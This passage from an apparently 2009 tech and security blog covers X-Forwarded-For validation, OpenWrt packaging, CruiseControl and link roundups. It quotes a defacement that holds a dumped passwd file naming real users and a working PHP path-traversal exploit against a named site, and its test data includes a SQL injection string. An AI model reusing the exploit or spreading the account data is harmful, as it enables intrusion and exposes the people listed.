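    if not header_value:
        return addresses
    for part in header_value.split(",")[:max_entries]:
        try:
            addresses.append(ipaddress.ip_address(part.strip()))
        except ValueError:
            continue
    return addresses


def describe_client(remote_addr, header_value):
    """Keep the trusted peer address and the untrusted claims strictly apart."""
    return {
        "peer": str(ipaddress.ip_address(remote_addr)),
        "claimed": [str(ip) for ip in parse_forwarded_for(header_value)],
    }


if __name__ == "__main__":
    spoofed = "10.1.2.3, 2001:db8::1, '; DROP TABLE users;--"
    print(describe_client("203.0.113.7", spoofed))
```

Even after validation the claimed addresses remain untrusted; they just can no longer break the SQL query or the HTML page they end up in.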

The conclusion is that you must take great care in determining which input parameter can be controlled by whom and under what conditions, and make your judgment call on filtering and escaping depending on that. When in doubt, filter. It is better to lose a couple of milliseconds in performance than to end up with a p0wned infrastructure.

Update: Another potentially dangerous situation is when a reverse proxy sits in front of one or more webservers. With this setup the developer can easily get the impression that the X-Forwarded-For header is controlled by our proxy, so it is safe to use the values from it without filtering, right? Wrong! A quick look at two widely used solutions (Apache and Squid) shows that both can be configured to concatenate the user-supplied value with the IP address. In fact, this is the default behaviour for mod_proxy.
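
Since the proxy appends the address it saw to whatever the client sent, only the rightmost entries can be trusted. One way to deal with this is to walk the list from right to left and stop at the first address which is not one of our own proxies. The following Python sketch shows that approach; the function name and the trusted range are made up for the example:

```python
import ipaddress


def real_client_ip(remote_addr, header_value, trusted_proxies):
    """Pick the client address when our own reverse proxies append to X-Forwarded-For.

    `trusted_proxies` is a list of networks (CIDR strings) that we operate.
    """
    trusted = [ipaddress.ip_network(network) for network in trusted_proxies]

    def is_trusted(ip):
        return any(ip in network for network in trusted)

    peer = ipaddress.ip_address(remote_addr)
    if not is_trusted(peer):
        # The request did not come through our proxy: ignore the header.
        return str(peer)

    hops = [hop.strip() for hop in (header_value or "").split(",") if hop.strip()]
    for hop in reversed(hops):
        try:
            ip = ipaddress.ip_address(hop)
        except ValueError:
            break  # garbage: everything further left is untrusted as well
        if not is_trusted(ip):
            return str(ip)  # first address not added by one of our proxies
        peer = ip
    return str(peer)


if __name__ == "__main__":
    # The client sent "10.1.2.3"; our proxy appended the address it really saw.
    print(real_client_ip("192.168.0.5", "10.1.2.3, 203.0.113.7", ["192.168.0.0/24"]))
```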

Speaking of p0wned infrastructure, apparently 2600.com was defaced for a short period of time over the weekend and contained the following piece of output (archived for posterity):


Go Hack Tetris!

o_O

O_o

^_O

www.gosu.pl/tetris/


http://www.2600.com/cuba/index.khtml?postetc/passwd

root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
ftp:*:21:21:Anonymous FTP:/u/ftp:/sbin/nologin
sshd:*:22:65533:sshd unprivileged processes:/:/sbin/nologin
postfix:*:25:25:Postfix Mail System:/nonexistent:/nonexistent
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
apache:*:80:80:Apache:/nonexistent:/sbin/nologin
apache2:*:8080:80:Apache:/nonexistent:/sbin/nologin
webstats:*:81:83:Web Statistics:/nonexistent:/sbin/nologin
thttpd:*:82:82:thttpd web server:/nonexistent:/sbin/nologin
htproxy:*:85:85:http proxy server:/nonexistent:/sbin/nologin
audit:*:87:87:system audit processes:/nonexistent:/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/sbin/nologin
namazu:*:89:89:Namazu Database:/var/db/namazu:/sbin/nologin
apache2:*:90:90:World Wide Web Owner:/nonexistent:/sbin/nologin
ash:*:1000:1000:ash:/home/ash:/bin/tcsh
emmanuel:*:1001:20:emmanuel:/home/emmanuel:/bin/tcsh
mec:*:1002:1002:mec:/home/mec:/sbin/nologin
omar:*:1003:1003:omar:/home/omar:/sbin/nologin
marko:*:1004:1004:marko:/home/marko:/sbin/nologin
kerry:*:1005:1005:kerry:/home/kerry:/bin/tcsh
juintz:*:1006:1006:juintz:/home/juintz:/bin/tcsh
css:*:1007:1007:carl shapiro:/home/css:/bin/tcsh
kpx:*:1008:1008:kpx:/home/kpx:/sbin/nologin
lgonze:*:1009:1009:lgonze:/home/lgonze:/sbin/nologin
mlc:*:1010:1010:mlc:/home/mlc:/bin/tcsh
ashcroft:*:1011:1011:ashcroft:/home/ashcroft:/usr/local/bin/noshell
ortbot:*:2001:2001:www.ortinstitute.org automated processes:/nonexistent:/sbin/nologin
lexnex:*:2002:2002:lexnex:/home/lexnex:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
sephail:*:1012:1012:Joseph Battaglia:/home/sephail:/sbin/nologin
redhackt:*:1013:1013:Red Hackt:/home/redhackt:/bin/tcsh
thedave:*:1014:1014:Dave Buchwald:/home/thedave:/bin/tcsh
phiber:*:1015:1015:Phiber:/home/phiber:/bin/tcsh
mark:*:1016:1016:Mark:/home/mark:/usr/local/bin/bash

<?php

// current path: $webroot = "/u/www/www.2600.com";

$file = '../../../etc/passwd';
// file can also be a directory name (must end with a slash) - gives directory structure, file_get_contents bug??
// its a little obfuscated with some random chars, but readable

// ------

$save = 'sources/';

$url = 'http://www.2600.com/cuba/index.khtml?post=';
$post = './/../../'.$file;

$overflow = 993;

while (strlen($post) < $overflow) {
    $post = str_replace('.//', './//', $post);
}

$url = $url . $post;

$cont = curl_cont($url);

preg_match('#<div id=\'blog\'>\s*<strong>[^<>]+</strong>\s*<br>([\s\S]+)</div>\s*<div class=\'clears\'>\s*</div>#Ui', $cont, $match);
$cont = $match[1];
$cont = preg_replace('#(\r\n|\n|\r)<br>(\r\n|\n|\r)(\r\n|\n|\r)<br>(\r\n|\n|\r)#', "\r\n\r\n", $cont);
$cont = preg_replace('#<br>(\r\n|\n|\r)#', "\r\n", $cont);
$cont = trim($cont);

if (!$cont) {
    echo 'failed';
    exit;
}

highlight_string($cont);

if (!function_exists('fput')) {
    function fput($f, $s)
    {
        $fp = fopen($f, 'w');
        fwrite($fp, $s);
        fclose($fp);
    }
}

$file = str_replace('http://www.2600.com/cuba/index.khtml?post=', '', $url);
$file = str_replace('../', '', $file);
$file = str_replace('./', '', $file);
$file = preg_replace('#/{2,}#', '', $file);
$file = str_replace('/', '-', $file);

if (!$file) {
    $file = '__index';
}
if ($file) {
    $file = $save.$file;
    if (!file_exists($file)) {
        @fput($file, $cont);
    }
}

function curl_cont($url, $options = array())
{
    $page = curl_get($url, $options);
    if (200 == $page['http_code']) {
        return $page['cont'];
    }
    return null;
}
function curl_get($url, $options = array())
{
    $url = str_replace(' ', '%20', $url);
    $ch = curl_init($url);

    curl_setopt($ch, CURLOPT_HEADER, isset($options['include_header']) ? $options['include_header'] : 0);
    if (substr($url, 0, strlen('https')) == 'https') {
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    }
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    if (isset($options['userpwd'])) {
        curl_setopt($ch, CURLOPT_USERPWD, $options['userpwd']);
    }
    if (isset($options['timeout'])) {
        $timeout = ceil($options['timeout']);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    }
    if (isset($options['max_size'])) {
        $range = "0-{$options['max_size']}";
        curl_setopt($ch, CURLOPT_RANGE, $range);
    }
    if (isset($options['referer'])) {
        curl_setopt($ch, CURLOPT_REFERER, $options['referer']);
    }
    // example agent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'
    if (isset($options['agent'])) {
        curl_setopt($ch, CURLOPT_USERAGENT, $options['agent']);
    }
    if (isset($options['headers'])) {
        curl_setopt($ch, CURLOPT_HTTPHEADER, $options['headers']);
    }
    if (isset($options['cookie']) && count($options['cookie'])) {
        $cookie = '';
        foreach ($options['cookie'] as $name => $value) {
            $cookie .= sprintf('%s=%s; ', $name, urlencode($value));
        }
        $cookie = trim($cookie);
        curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    }

    $cont = curl_exec($ch);
    $error = curl_error($ch);
    if ($error) {
        trigger_error('curl_exec() failed: '.$error, E_USER_ERROR);
    }
    $inf = curl_getinfo($ch);
    $inf['cont'] = $cont;
    curl_close($ch);

    return $inf;
}

?> 

Picture taken from Simon Strandgaard's photostream with permission.

Friday, April 10, 2009

Hackish method to include custom content into CruiseControl

0 comments

Disclaimer: I’m a CruiseControl newbie, so there might well be a much better / simpler / cleaner method to achieve this. However this is the way I managed to get it working.

  1. Write your (Perl) script and make it output something like this:
    
    <testsuite tests="0" name="summary" failures="0"><system-out>
    foo bar
    </system-out></testsuite>
  2. Make your script run during the build. This can be done directly using exec or in an ant subtask using the exec task. One thing to keep in mind is that CC stops at the first failure – this can be important if you want to run your script even during failures (because it collects statistics about the failures for example)
  3. Check that the output is present in the XML log resulting from the build.
  4. Hack the XSL such that the contents are displayed in the result HTML email for example:
    
    <table align="center" cellpadding="2" cellspacing="0" border="0" class="header" width="98%"><tr><td>
      <pre><xsl:value-of select="/cruisecontrol/testsuite[@name='summary']/system-out" /></pre>
    </td></tr></table>
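For step 1, the one thing that is easy to get wrong is that the script output must stay well-formed XML even if the text contains characters like < or &. A minimal sketch of such a generator, written in Python here instead of Perl (the function name summary_testsuite is made up for this example):

```python
from xml.sax.saxutils import escape


def summary_testsuite(text):
    """Wrap free-form text in the testsuite element shown in step 1."""
    return (
        '<testsuite tests="0" name="summary" failures="0"><system-out>\n'
        + escape(text)  # escapes &, < and > so the log stays well-formed
        + "\n</system-out></testsuite>"
    )


print(summary_testsuite("foo bar"))
```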
    

That’s it folks! Hope that somebody finds it useful.

Picture taken from chippenziedeutch's photostream with permission.

Blogs I’m reading

0 comments

I decided to add a blogroll to my sidebar, however a complete list would have been waaaay too long. Also, I didn’t like the idea of exporting the OPML from Google Reader and massaging it into an HTML format, because it would have meant another thing which needed periodic updates.

The solution was to take my “shared items” feed from Google Reader, massage it a bit using Yahoo Pipes to create another feed which contains the distinct blogs that had postings in the original feed, and include the resulting RSS feed in the sidebar. Unfortunately Blogger renders the feed gadget asynchronously via javascript, which means that I won’t give link goodies to the blogs, even though I would like to :-(.

If you wish to use the pipe yourself, it can be found here. All you need is to plug your RSS feed into it and you get back an RSS feed containing the (distinct) blogs and links to them. Given that I continuously update my shared list with things I read, the list too will get updated frequently.
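The core of what the pipe does can be sketched in a few lines of Python. This is only an illustration of the deduplication step, not the pipe itself; the field names blog_title and blog_url are assumptions about how the shared items would be represented.

```python
def distinct_blogs(items):
    """Return (title, url) pairs for each source blog, in first-seen order."""
    seen = set()
    blogs = []
    for item in items:
        url = item["blog_url"]
        if url not in seen:
            seen.add(url)
            blogs.append((item["blog_title"], url))
    return blogs


shared = [
    {"blog_title": "Blog A", "blog_url": "http://a.example/"},
    {"blog_title": "Blog B", "blog_url": "http://b.example/"},
    {"blog_title": "Blog A", "blog_url": "http://a.example/"},
]
print(distinct_blogs(shared))
```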

Picture taken from oddsock's photostream with permission.

Wednesday, April 08, 2009

Mixed links

0 comments

Via certifiedbug.com: Spybot Search & Destroy competitors are trying to force its removal – what this article doesn’t talk about is that Spybot S&D is basically a hobbyist tool with very low efficiency. It made a name for itself back in the day, when the malware problem was much smaller, but these days all respectable Anti-Malware solutions include an anti-spyware module (including the free-for-personal-use ones like AVG), so you don’t need a separate program for it. Further proof of Spybot’s “hobbyist” status is the sub-optimal method it uses to block domains (essentially putting them in the “restricted zone” for IE – which can cause performance problems for IE8 and is mostly ineffective if you are using other browsers).

On the Errata Security blog we have more details about the recent Core IP FBI raid. It is sad (frightening?) that because of one suspected customer they felt that they had to take all those servers. I guess that this makes “international” infrastructure, like EC2, with datacenters in different jurisdictions, more attractive. Probably criminals will also catch on and make the work of law enforcement harder...

Via the hexale blog: The Java Virtual Machine As Shellcode – ok, a nice technological demo, but why not just build on top of metasploit? A 4.5MB agent? Really?

From the F-Secure blog: Understanding the Spreading Patterns of Mobile Phone Viruses [PDF]. Mostly pretty pictures and a fairly obvious conclusion: Bluetooth malware spreads more slowly than MMS malware.

From the Google Tech Talks (there are some very cool gems there!): The Value of Informed Choice in Protecting Consumers, a Product, and a Company – an inspiring presentation. We need more business leaders like this. Favorite quote: "When you put it in the hand of marketing people, you are in deep trouble."

It seems that the Google App Engine will start supporting Java soon.

Another AV false positive issue: AntiVir, Tor Browser Bundle, and trojan Dropper.Gen false positive. Fortunately Avira has a functional interface for reporting false positives, and, according to the reply, it will be resolved with the next signature update.

I too saw yesterday the post from SANS about PHP interpreting .php.bak files for example. The Computer Defense blog raises some issues: it seems that this is not true in all the cases, although it is true in many of them. Here are some relevant links / quotes from the Apache documentation:

  • AddType Directive: “Filenames may have multiple extensions and the extension argument will be compared against each of them.”
  • Files with Multiple Extensions: “If you would prefer only the last dot-separated part of the filename to be mapped to a particular piece of meta-data, then do not use the Add* directives. For example, if you wish to have the file foo.html.cgi processed as a CGI script, but not the file bar.cgi.html, then instead of using AddHandler cgi-script .cgi, use...” (see the documentation for the example)
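A simplified model of the difference, written as a Python sketch: in the first function every dot-separated extension can trigger a handler (which is how a file like config.php.bak ends up being executed), in the second only the last one counts. The mapping and function names are invented for this illustration and this is not how mod_mime is actually implemented.

```python
HANDLERS = {"php": "php-script"}  # hypothetical extension-to-handler mapping


def handlers_any_extension(filename, handler_map):
    """Every dot-separated part after the base name is treated as an extension."""
    extensions = filename.split(".")[1:]
    return [handler_map[ext] for ext in extensions if ext in handler_map]


def handler_last_extension(filename, handler_map):
    """Only the final extension is considered."""
    if "." not in filename:
        return None
    return handler_map.get(filename.rsplit(".", 1)[-1])


print(handlers_any_extension("config.php.bak", HANDLERS))
print(handler_last_extension("config.php.bak", HANDLERS))
```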

Via the terminal23.net blog:

According to the Department's [the quote is about the USA DoD] own analysis, nearly 70% of the network traffic leaving the Department through a single one of its Internet gateways during the month of January 2008 was bound for known hostile countries and the Department lacked the capability to even determine what the traffic was.

It seems that as companies / organizations grow, they lose their ability to secure data exponentially.

Compiling software for OpenWrt (and creating packages)

3 comments

From my experience, compiling software is not especially hard, but most of the tutorials out there are somewhat dated (as this one will be in 6-7 months). But at least until then it can be useful, and hopefully I will find the time to update it later on. I’m using the trunk version of OpenWrt, which is a little more up-to-date than 8.09, but most probably everything described here works with 8.09 (the latest release).

I’ve taken inspiration from the following sources:

The main ideas would be:

  • The easiest way to start is by copying an existing makefile and editing it to fit your needs
  • OpenWrt has an advanced build system which does all the following things:
    • Download the application from its original source (and verify the integrity of the archive using md5sum)
    • Apply some local patches to it
    • Configure / build it
    However, for local development you most likely won't need this. An alternative solution (which will be used in the tutorial later on) would be to copy the source to the build directory in the preparation phase.
  • Makefiles are very sensitive to tabs (so you have to have tabs and not 4 or 8 spaces in certain locations) and also, errors in them are very cryptic (for example "missing separator"). If your build fails, the first thing you should check is that you have your tabs in order. Also verify that your editor doesn’t have some kind of “transform tabs to spaces” option active. For example, if you are using mcedit with the default color-scheme, it will highlight correct tabs in red, as can be seen in the screenshot below.
    mcedit_openwrt_package Also, you might have observed that not all the sections use tabs; some are ok with spaces. However, the rules for which section should use what are not clear to me, so my recommendation is to stick with tabs everywhere. For a quick make tutorial, you can check out this site. A last word of warning on this matter: copy-pasting from this blogpost will almost certainly mess things up (convert tabs to spaces, etc), so please double check the source after copying it.
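If you follow the "tabs everywhere" recommendation, checking a makefile after copy-pasting becomes trivial: any non-empty line that starts with a space is suspect. A small Python sketch of such a check (the function name and the sample text are made up for this example; it is a heuristic, not a makefile parser):

```python
def space_indented_lines(makefile_text):
    """Return (line_number, line) pairs for non-empty lines indented with spaces."""
    suspicious = []
    for number, line in enumerate(makefile_text.splitlines(), start=1):
        if line.startswith(" ") and line.strip():
            suspicious.append((number, line))
    return suspicious


sample = "clean:\n    rm -f *.o helloworld\nall:\n\tmake helloworld\n"
for number, line in space_indented_lines(sample):
    print(f"line {number}: indented with spaces: {line!r}")
```

To check a real file, read it with open("Makefile").read() and pass the result to the function.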

Our goal (taken from the first linked tutorial) is to get the following little C program to compile and run:


/****************
* Helloworld.c
* The most simplistic C program ever written.
* An epileptic monkey on crack could write this code.
*****************/
#include <stdio.h>

int main(void)
{
 printf("Hell! O' world, why won't my code compile?\n\n");
 return 0;
}

The first step is to create a Makefile for it:


# build helloworld executable when user executes "make"
helloworld: helloworld.o
	$(CC) $(LDFLAGS) helloworld.o -o helloworld
helloworld.o: helloworld.c
	$(CC) $(CFLAGS) -c helloworld.c

# remove object files and executable when user executes "make clean"
clean:
	rm *.o helloworld

Place the files in the packages/helloworld/src directory of either the checked-out OpenWrt source or the OpenWrt SDK. Now change into this directory and make sure that everything builds on our local system (without the cross-compiling magic):


make
./helloworld <-- this should output the message
make clean   <-- clean up after ourselves

Now to create the OpenWrt makefile. This will be located one level up (ie. packages/helloworld/Makefile):


#
# Copyright (C) 2008 OpenWrt.org
#
# This is free software, licensed under the GNU General Public License v2.
# See /LICENSE for more information.
#
# $Id$

include $(TOPDIR)/rules.mk

PKG_NAME:=helloworld
PKG_RELEASE:=1

include $(INCLUDE_DIR)/package.mk

define Package/helloworld
	SECTION:=utils
	CATEGORY:=Utilities
	TITLE:=Helloworld -- prints a snarky message
endef

define Build/Prepare
	mkdir -p $(PKG_BUILD_DIR)
	$(CP) ./src/* $(PKG_BUILD_DIR)/
endef

define Build/Configure
endef

define Build/Compile
	$(MAKE) -C $(PKG_BUILD_DIR) $(TARGET_CONFIGURE_OPTS)
endef

define Package/helloworld/install
	$(INSTALL_DIR) $(1)/bin
	$(INSTALL_BIN) $(PKG_BUILD_DIR)/helloworld $(1)/bin/
endef

$(eval $(call BuildPackage,helloworld))

The makefile should be pretty self-explanatory. A couple of things I would like to highlight:

  • Build/Prepare is the step where we copy our source code to the build directory. This is a hack to circumvent the need of downloading the tgz file, but it is a hack which works well (you might want to add the -r switch to cp if you have nested directories in src – this isn’t the case for this simple example)
  • In the Build/Compile step it is very important to include the $(TARGET_CONFIGURE_OPTS) part. Without it, the thing will build, but it will link with the standard libc (glibc), rather than the uClibc available on the OpenWrt router. Tracking down this error is made harder by the unintuitive error messages. Specifically, you will see something like this on your router: “/bin/ash: The command /bin/helloworld can not be found”, even though you see that the file exists and it has execute permissions! To verify that your issues are caused by this problem, simply do a “less /bin/helloworld” on your router and check to see if you have strings indicating glibc (instead of uClibc).
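The "look for strings" check can also be scripted on the build machine before copying anything to the router. The following Python sketch searches the binary for marker strings; the markers themselves (ld-uClibc for the uClibc dynamic loader, ld-linux and GLIBC_ for glibc) are my assumptions about what such binaries typically contain, so treat the result as a hint only.

```python
def guess_libc(binary_bytes):
    """Guess which C library a dynamically linked binary was built against."""
    if b"ld-uClibc" in binary_bytes:
        return "uClibc"
    if b"ld-linux" in binary_bytes or b"GLIBC_" in binary_bytes:
        return "glibc"
    return "unknown"


def guess_libc_of_file(path):
    """Read the file at path and apply guess_libc to its contents."""
    with open(path, "rb") as handle:
        return guess_libc(handle.read())


print(guess_libc(b"\x7fELF.../lib/ld-uClibc.so.0..."))
```

For example, guess_libc_of_file("helloworld") could be run on the freshly built executable in the build directory.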

Now you are ready to compile:

  • If you are using the SDK, simply go to its root directory and issue the make V=99 command
  • If you are building the complete tree, you have to first do “make menuconfig”, make sure that your package is checked for build (you should see the letter M near it) and then issue make V=99. Be aware that compiling the full tree can take considerable time (more than an hour in some cases).

Your package should now be ready. Copy the package (you will find it in the bin/packages/target-... subfolder) to your router (or better yet, a Qemu VM running OpenWrt – for safety) and test that everything works:


scp helloworld.ipkg root@router:/root
[root@router]# opkg install helloworld.ipkg
[root@router]# helloworld <-- the message should be printed

This would be all :-). For the sake of simplicity, this tutorial doesn’t cover the calling of configuration scripts. Also, as far as I’ve seen, there is no easy way to include parts of other projects. For example, if I wish to create a package for LuaFileSystem, I would need lua.h (and some other, related files). However, I haven’t found an easy way to reference it from the lua package, and have opted for putting a local copy in the src/lua subdirectory.

Picture taken from cantrell.david's buddy icon with permission.

Tuesday, April 07, 2009

Old habits die hard

1 comments

Last year I complained about ParetoLogic being a sponsor for the 2008 Virus Bulletin conference. It seems that my concerns were at least partially justified: as this post from the ESET blog points out, they are back to using overhyped and inaccurate text in their advertisements, much like the rogue security products.

Picture taken from Navin75's photostream with permission.

Mixed links

1 comments

Found this via the Database Soup blog: the PostgreSQL channel on vimeo – a couple (and hopefully more to come) videos on PostgreSQL.

A relatively long discussion about some AV’s having a false detection for VirtualDub. It is useful in the sense that you can see the (mis)conceptions people have about the matter.

Originally I wasn’t going to comment on this, but I just can’t take it: Bill Pytlovany, with whom I have had run-ins before, posted what I consider to be a joke in very poor taste. Since then he has taken it down, but you can still see it in the Google cache. Now, I haven’t made up my mind on the Tibet issue either way (I didn’t have time to study it in enough depth to say that I have an informed opinion), but using it in a joke is disrespectful either way.

From the Database Geek blog: the PlayStation 2 will be available for under 100 USD – w00t, another cheap device to run Linux on!

From Oraclenerd: Unskilled and Unaware of It [PDF]. A very sad (or frightening, depending on how you look at it) article explaining that people are more likely to overestimate their capabilities the less they know about the area.

From a SUN blog: Effects of Flash/SSD on PostgreSQL - PostgreSQL East 2009. Of course this is from a SUN employee and SUN sells SSD’s for servers, but still an interesting read.

On the zillablog we have a presentation about the new features to come in PostgreSQL 8.4. Very cool, and there is very little time left until it is released (it should be released on the 1st of May if everything goes well):

From a good friend of mine (even though he uses Wordpress :-P): Top ten striptease songs.

From taint.org: Creator of Cyc reviews Wolfram Alpha. Very cool (also, I haven’t heard about cyc until now, so it was interesting also from that point of view). Also from taint.org: on url shorteners, which mentions a site having quite a large list with URL shortening services (might come in handy some day).

From the Old New Thing blog: Windows 95 almost had floppy insertion detection but the training cost was prohibitive and the follow up – very interesting to know that floppy drives had the capability of detecting (and signaling) the presence of disks without spinning them up. I just wonder: does this apply to both 3.5” and 5.25” floppy drives? :-)

Detecting event support without browser sniffing – browser sniffing is bad, and this is a cool thing.

Comparison between the different mobile appstores

NAS Troubleshooting via the Back Door – yes, web interfaces for such equipment are quite insecure. On a similar note, I started looking at CGILua and noted several security problems at first glance (using a very small space for session id’s, not always checking the passed-in session id, being prone to truncating strings due to NUL characters – although that might have been because of mini-httpd, I didn’t check the details).

Via the virus blog: Circos, an interesting looking visualization method which can be useful in some cases.

From the Reverse Engineering Reddit: ZIP Attacks with Reduced Known-Plaintext – oldie, but goodie. The problem with the ZIP format is that there are too many variations out there, and you can never be sure what a program means when it says that it supports “ZIP encryption”.

A cool way to geolocate the client – unfortunately it doesn’t always work.

Dealing with those pesky “unnamed” threats – another explanation of why whitelisting is better than blacklisting if you can afford it.

A Quick Survey on Intermediate Representations for Program Analysis – should be interesting for reverser / decompiler (or other analysis tool) authors.

The MSHTML Host Security FAQ: Part I of II and Part II. Interesting, but most options are opt-in for backward compatibility reasons (I assume), so existing applications won’t take advantage of them :-(.

Via the <?PHPDeveloper blog: 5 cool things you can do with windows and php – mostly WMI invocations.

A quote from the HolisticInfoSec blog:

The difference is that... IF... you own, and run, your own servers, or systems/software... AND, a "common vulnerability" exists, and is exploited... You MAY be vulnerable... you MAY have a security issue... you MAY be targeted... you MAY not have adequately protected your system... you MAY be hit by the problem... you MAY have issues, and losses... possibly.
If, however, you are dependent upon any, EXTERNAL, single point-of-attack/vulnerable-point... then you WILL be hit... you WILL be affected... you WILL have losses... and you WILL be totally-dependent upon EXTERNAL-interests in "fixing", and recovering... based upon THEIR competence, and on THEIR time-table... and, to suit THEIR perception of THEIR interests.
In other words, ALL YOUR EGGS in [SOMEONE ELSES] basket.

From games.slashdot.org: a new version (2.5) of Nexuiz, an open-source FPS game, has been released. It looks good, and for an Unreal 2003 fan like me, is very good (OpenArena looked a little too cartoonish for my taste). With the previous version (2.4) I had some negative experiences on Ubuntu, and 2.5 isn’t in the repos yet. It also seems that they are implementing some interesting anti-cheat mechanisms.

Common Apache Misconception – an important catch of the standard Apache/PHP (and possibly other scripting engines) configuration.

This is funny, even if you don’t follow Formula 1:

From the Google Code blog: Google Code Blog: AJAX APIs Playground Ver. 2 – some very cool updates. The Firebug Lite integration is especially nice!

From the Mailinator(tm) Blog I found my way to this post: Thread per connection : NIO, Linux NPTL and epoll which asserts that the Java NIO (New IO) is actually slower on modern systems than the old model, which highlights the need to profile before “optimizing” your code. A similar post/video: Java Performance Myths. Again, measure twice, cut once.

Picture taken from MinivanNinja's photostream with permission.

Optimizing regular expressions with PHP

0 comments

I was intrigued by the following text in the PHP reference, especially because there is considerable regex use in the webhoneypot project:

S When a pattern is going to be used several times, it is worth spending more time analyzing it in order to speed up the time taken for matching. If this modifier is set, then this extra analysis is performed. At present, studying a pattern is useful only for non-anchored patterns that do not have a single fixed starting character.

My questions were: (a) what exactly does it mean by “using”, since PHP doesn’t have the concept of “compiling” regular expressions like other languages have and (b) in which cases are these optimizations useful?

The first useful information about the issue I found on Stack Overflow, where a comment by EBGreen mentioned the book “Mastering Regular Expressions” by Jeffrey Friedl. You can take a peek into the book using books.google.com. Starting with page 478 it discusses efficiency issues in PHP, including the S modifier. A quote from it:

Currently, the situations where study can and can’t help are fairly well defined: it enhances what Chapter 6 calls the initial class discrimination optimization.

This is essentially the same as the explanation from the manual, however it also gives an example which makes the issue clearer:

Let’s say that you have the regex /0x[a-f0-9]+/i. It is pretty clear that a match is only possible at places in the string where we find a zero, and it makes no sense for the regex engine to try matching in other places (and in fact, it doesn’t). However, if we have an expression like /<i>|<b>|<em>/i, it is still clear to the human observer that only places containing “<” can be a starting point for the match, but the regex engine doesn’t know this unless the S flag is specified and it has the chance to perform some analysis on the regex.
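The idea behind this optimization can be illustrated with a toy Python sketch: for an alternation of literal strings, collect the set of possible first characters and only consider positions in the subject where one of them occurs. This is only a model of the concept for literal alternatives, not what PCRE actually does internally, and the function names are made up.

```python
def first_chars(alternatives, ignore_case=True):
    """Collect every character a match of one of the literals could start with."""
    chars = set()
    for alternative in alternatives:
        first = alternative[0]
        if ignore_case:
            chars.update({first.lower(), first.upper()})
        else:
            chars.add(first)
    return chars


def candidate_positions(subject, alternatives):
    """Positions where a match attempt is worth making at all."""
    starts = first_chars(alternatives)
    return [index for index, char in enumerate(subject) if char in starts]


print(candidate_positions("a <b>bold</b> move", ["<i>", "<b>", "<em>"]))
```

For the sample string only two of the eighteen positions survive the filter, which is where the potential speedup comes from.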

Now let’s put some relative numbers to this explanation: I used preg_match_all with an expression similar to the second one in a loop to extract all the matches from a ~20MB string 10 000 times, once with and once without the S modifier. The difference was less than 2% (in absolute terms this would mean less than 2 seconds on my machine), which is not statistically significant, since the variation between different runs was ~50%. Given that most applications do far fewer calls to the PCRE library on much shorter strings, the S modifier for the moment doesn’t seem to have a noticeable performance impact.
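The reasoning used here (a difference only counts if it is larger than the run-to-run noise) can be sketched as a tiny benchmark harness. This is a Python illustration with made-up function names and a much smaller input; it does not reproduce the PHP measurement, and Python's re module has no equivalent of the S modifier.

```python
import re
import statistics
import time


def time_runs(func, repeats=5):
    """Run func several times and return the wall-clock duration of each run."""
    durations = []
    for _ in range(repeats):
        start = time.perf_counter()
        func()
        durations.append(time.perf_counter() - start)
    return durations


def difference_exceeds_noise(times_a, times_b):
    """True if the gap between the means is larger than the spread within either set."""
    gap = abs(statistics.mean(times_a) - statistics.mean(times_b))
    noise = max(max(times_a) - min(times_a), max(times_b) - min(times_b))
    return gap > noise


subject = "<b>x</b> plain text " * 10000
pattern = re.compile(r"<i>|<b>|<em>", re.IGNORECASE)
baseline = time_runs(lambda: pattern.findall(subject))
print(min(baseline), max(baseline))
```

Timing a second variant the same way and passing both lists to difference_exceeds_noise gives a crude answer to whether the change is worth keeping.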

Finally, here is an interesting presentation about writing a compiler for PHP from the Google Tech-Talks collection:

Picture taken from Geek&Poke's photostream with permission.

Monday, April 06, 2009

Learning is never done

1 comments

I’ve been using PHP for a while now and thought that I knew the available functions (at least the generic ones) pretty well, but recently I got surprised: a recent entry on the Me and My Database blog pointed me towards http_build_query and in the same category I found parse_url. This is significant to me, since I used some hacked-up regular expression to do the same in the webhoneypot. So I ripped out my regex and replaced it with parse_url. There are at least three advantages to using built-in functions:

  • they are fast
  • they are probably better tested than your code
  • your code will be shorter (and less to maintain for you)

So next time you want to do something, take a look around, maybe there is a PHP function which already does what you want (or almost what you want). Admittedly, the organization (naming) of the functions is not always the most consistent, intuitive one, but the searching effort is well worth it.
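The same advice holds in other languages. As an illustration, here is how the two tasks look with Python's standard library, where urlsplit and parse_qs play roughly the role of parse_url and urlencode that of http_build_query (the example URL is made up):

```python
from urllib.parse import parse_qs, urlencode, urlsplit

# Take a URL apart without any hand-written regular expression.
parts = urlsplit("http://example.com:8080/index.php?post=42&lang=en#top")
print(parts.scheme, parts.hostname, parts.port, parts.path)
print(parse_qs(parts.query))

# Build a query string; special characters are escaped for us.
query = urlencode({"post": 42, "q": "a b&c"})
print(query)
```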

Picture taken from triplezero's photostream with permission.

License your work!

1 comments

This post was inspired by the “I’m a creative commoner” post of the dammit.lt blog. Disclaimer: IANAL – I Am Not A Lawyer.

Why should you license your work?

  • because it makes clear under what conditions it can be reused / quoted / etc
  • because it is more probable that others will use it and use it in a way you are comfortable with
  • because if you have to enforce your license (think of splogs), you have clear terms others have to comply with
